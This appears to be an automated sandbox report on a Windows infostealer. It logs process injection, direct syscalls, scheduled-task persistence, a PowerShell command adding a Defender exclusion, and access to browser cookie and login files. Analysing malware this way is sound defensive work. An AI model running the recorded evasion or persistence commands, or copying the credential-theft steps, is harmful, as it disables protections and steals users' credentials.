                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtSetInformationThread: Direct from: 0x773763F9
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtCreateMutant: Direct from: 0x773835CC
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtNotifyChangeKey: Direct from: 0x77383C2C
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtSetInformationProcess: Direct from: 0x77382C5C
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtCreateUserProcess: Direct from: 0x7738371C
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtQueryInformationProcess: Direct from: 0x77382C26
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtResumeThread: Direct from: 0x77382FBC
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtWriteVirtualMemory: Direct from: 0x7738490C
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtReadFile: Direct from: 0x77382ADC
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtDelayExecution: Direct from: 0x77382DDC
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtQuerySystemInformation: Direct from: 0x77382DFC
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtOpenSection: Direct from: 0x77382E0C
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtQuerySystemInformation: Direct from: 0x773848CC
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtReadVirtualMemory: Direct from: 0x77382E8C
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtCreateKey: Direct from: 0x77382C6C
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtAllocateVirtualMemory: Direct from: 0x773848EC
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtQueryAttributesFile: Direct from: 0x77382E6C
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtSetInformationThread: Direct from: 0x77382B4C
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtQueryInformationToken: Direct from: 0x77382CAC
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtOpenKeyEx: Direct from: 0x77382B9C
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtDeviceIoControlFile: Direct from: 0x77382AEC
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtCreateFile: Direct from: 0x77382FEC
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtOpenFile: Direct from: 0x77382DCC
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtTerminateThread: Direct from: 0x77377B2E
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\runas.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\runas.exe Section loaded: NULL target: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe protection: read write
                Source: C:\Windows\SysWOW64\runas.exe Section loaded: NULL target: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\runas.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\runas.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe Section loaded: NULL target: C:\Windows\SysWOW64\runas.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\runas.exe Thread register set: target process: 6704
                Source: C:\Windows\SysWOW64\runas.exe Thread APC queued: target process: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe Process created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D84008Jump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe"Jump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp3545.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"Jump to behavior
                Source: hAtMBptzWt.exe, 00000010.00000002.3355437210.00000000015B0000.00000002.00000001.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000010.00000000.2407589173.00000000015B0000.00000002.00000001.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000014.00000002.3354934294.00000000017A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: hAtMBptzWt.exe, 00000010.00000002.3355437210.00000000015B0000.00000002.00000001.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000010.00000000.2407589173.00000000015B0000.00000002.00000001.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000014.00000002.3354934294.00000000017A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: hAtMBptzWt.exe, 00000010.00000002.3355437210.00000000015B0000.00000002.00000001.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000010.00000000.2407589173.00000000015B0000.00000002.00000001.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000014.00000002.3354934294.00000000017A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: hAtMBptzWt.exe, 00000010.00000002.3355437210.00000000015B0000.00000002.00000001.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000010.00000000.2407589173.00000000015B0000.00000002.00000001.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000014.00000002.3354934294.00000000017A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeQueries volume information: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeQueries volume information: C:\Users\user\AppData\Roaming\GDhinOc.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000011.00000002.3356201368.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.3351507216.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.3356454377.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000016.00000002.3353699793.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000015.00000002.2784770390.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2494272058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2496717609.00000000017B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2496908259.0000000001890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.3356254035.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000E.00000002.2694276231.0000000001B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000014.00000002.3356026671.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0.2.nK1Y86mbzfbkwpB.exe.5370000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.nK1Y86mbzfbkwpB.exe.5370000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2183096912.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\runas.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\runas.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\runas.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\runas.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\runas.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\runas.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\runas.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\runas.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\runas.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000011.00000002.3356201368.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.3351507216.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.3356454377.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000016.00000002.3353699793.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000015.00000002.2784770390.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2494272058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2496717609.00000000017B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2496908259.0000000001890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.3356254035.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000E.00000002.2694276231.0000000001B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000014.00000002.3356026671.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
